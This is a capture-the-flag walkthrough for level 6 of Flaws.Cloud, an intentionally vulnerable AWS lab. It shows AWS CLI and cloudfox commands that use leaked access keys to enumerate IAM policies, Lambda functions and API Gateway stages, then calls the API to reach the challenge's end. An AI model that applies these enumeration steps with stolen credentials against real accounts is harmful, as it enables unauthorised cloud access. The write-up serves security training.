Level 6

A CTF walkthrough for level 6 of Flaws.Cloud

Enumerating Access Keys

In the previous level, we were provided with AWS access keys. Let's figure out who they're for and enumerate our access.

aws --profile flaws6 sts get-caller-identity 

{
    "UserId": "AIDAIRMDOSCWGLCDWOG6A",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/Level6"
}

This time we can actually view our permissions!

aws --profile flaws6 iam list-attached-user-policies --user-name Level6

{
    "AttachedPolicies": [
        {
            "PolicyName": "MySecurityAudit",
            "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
        },
        {
            "PolicyName": "list_apigateways",
            "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
        }
    ]
}

The policies are pretty large so I won't paste them here but these commands will help you.

aws --profile flaws6 iam list-policy-versions --policy-arn <policy-arn>

aws --profile flaws6 iam get-policy-version --policy-arn <policy-arn> --version-id <policy-version>

Enumerating Access with cloudfox

I ended up running cloudfox again with this new profile.

cloudfox aws -p flaws6 all-checks

After enumerating the data, I discovered a service-role called Level6 and an attached policy AWSLambdaBasicExecutionRole. Although only the lambda service could assume this role.

So that was my hint that we probably need to trigger a lambda function which will assume the Level6 role and likely provide us with the next clue.

Enumerating Lambda

We can enumerate lambda functions like this,

aws --profile flaws6 lambda list-functions 

{
    "Functions": [
        {
            "FunctionName": "Level6",
            "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
[snip]

There's only one function and it's called Level6.

If we view the lambda policy, we can see the Apigateway service is allowed to trigger this function.

aws --profile flaws6 lambda get-policy --function-name Level6 | jq -r '.Policy' | jq

{
  "Version": "2012-10-17",
  "Id": "default",
  "Statement": [
    {
      "Sid": "904610a93f593b76ad66ed6ed82c0a8b",
      "Effect": "Allow",
      "Principal": {
        "Service": "apigateway.amazonaws.com"
      },
      "Action": "lambda:InvokeFunction",
      "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
      "Condition": {
        "ArnLike": {
          "AWS:SourceArn": "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"
[snip]

So, we need to put together the API that we need to call. The format is like this,

https://<rest-api-id>.execute-api.<region>.amazonaws.com/<api-stage-name>/<function-name>

With the enumeration thus far, we have all the details except the stage name but we can discover that like so,

aws --profile flaws6 apigateway get-stages --rest-api-id "s33ppypa75"               

{
    "item": [
        {
            "deploymentId": "8gppiv",
            "stageName": "Prod",
            "cacheClusterEnabled": false,
[snip]

Triggering the API

With all the required information discovered, we can trigger the API.

curl https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"

Navigating to the website, we discover the end of the challenge!

Wrap-Up

In Level 6, we enumerated our access with access keys discovered from the previous level. After much enumeration, this led to discovering an API that, once triggered, provided the end of the challenge.

PreviousLevel 5 NextAWS

Last updated 12 days ago